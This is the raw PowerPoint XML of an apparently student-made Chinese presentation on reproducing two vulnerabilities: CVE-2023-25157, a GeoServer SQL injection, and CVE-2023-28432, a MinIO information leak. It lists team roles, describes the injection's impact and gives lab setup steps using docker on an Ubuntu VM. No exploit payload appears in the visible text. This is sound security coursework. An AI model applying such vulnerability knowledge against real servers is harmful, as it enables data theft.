                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>(CVE-2023-25157)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr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环境搭建和漏洞复现</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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牛雪力 刘耀月</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0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94360">
                <a:tc vMerge="1"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poc编写和平台提交</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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李金霖</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0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9436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CVE-2023-28432 MiniO信息泄露漏洞</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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环境搭建和漏洞复现</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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常昊</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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94360">
                <a:tc vMerge="1"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poc编写和平台提交</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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张永豪</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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943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实验报告撰写</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0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李金霖</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-U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943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PPT制作与答辩</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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刘耀月、张永豪</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="1738630"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>项目实现过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t>复盘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="4247515" cy="5753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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="4153535"/>
            <a:ext cx="6136005" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Process Replay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204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365240" y="1931670"/>
            <a:ext cx="5089525" cy="4271010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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:def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139E4B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1pPr>
            <a:lvl2pPr marL="6858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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US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2pPr>
            <a:lvl3pPr marL="11430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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:def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3pPr>
            <a:lvl4pPr marL="16002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4pPr>
            <a:lvl5pPr marL="20574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9E4B"/>
              </a:buClr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Calibri" panose="020F050202020403020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GeoServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存在</a:t>
            </a:r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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入漏洞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Online Reviewer System 1.0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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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3800" y="1067435"/>
            <a:ext cx="8188498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zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GeoServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0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Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>geoserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0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Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL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注入漏洞介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CVE-ID:CVE-2023-25157</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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漏洞类别：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL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注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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在使用需要以数据库作为数据存储的功能时，攻击者可用通过精心构造的语法，绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GeoServer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的词法解析从而造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL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注入，获取服务器中的敏感信息，甚至可能获取数据库服务器权限。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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endParaRPr lang="en-US" altLang="zh-CN" sz="20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193800" y="492125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3800" y="389890"/>
            <a:ext cx="4890247" cy="575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39E4B"/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/>
              <a:t>过程复盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067435"/>
            <a:ext cx="7920355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2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1)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</a:rPr>
              <a:t>环境搭建</a:t>
            </a:r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r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在漏洞介绍界面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charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=8341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r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>找到漏洞源码下载地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> https://geoserver.org/download/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>选择版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.22.1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下载到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Ubuntu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系统的虚拟机上，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>docker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安装，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>选择安装路径并配置端口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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577975" y="5581015"/>
            <a:ext cx="792035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/>
            <a:endParaRPr lang="en-US" sz="16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r>
              <a:rPr lang="en-US" sz="16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ctr"/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9" y="3168636"/>
            <a:ext cx="9741401" cy="5207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9adb1125-0e14-4529-b355-03fc0907b461}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="890*428"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="40*73*890*428"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNmRjMjI3MDY1M2I2MGZiODVlNzZjNDYwZTZiZTY1MjIifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="b4c30777-b5d7-4683-a9ea-76cdd4b0d6df"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{c74f9a30-88e9-469f-a770-08c49d9570a3}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="837*374"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="64*96*837*374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A7A7A7"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="535353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7388</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>443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Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Lucida Handwriting</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Helvetica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刘耀月</dc:creator>
  <cp:lastModifiedBy>李沐钊</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-16T14:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-21T02:18:46Z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D510AC68D16740E0B7CB527A49696480_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14309</vt:lpwstr>
  </property>
</Properties>
</file>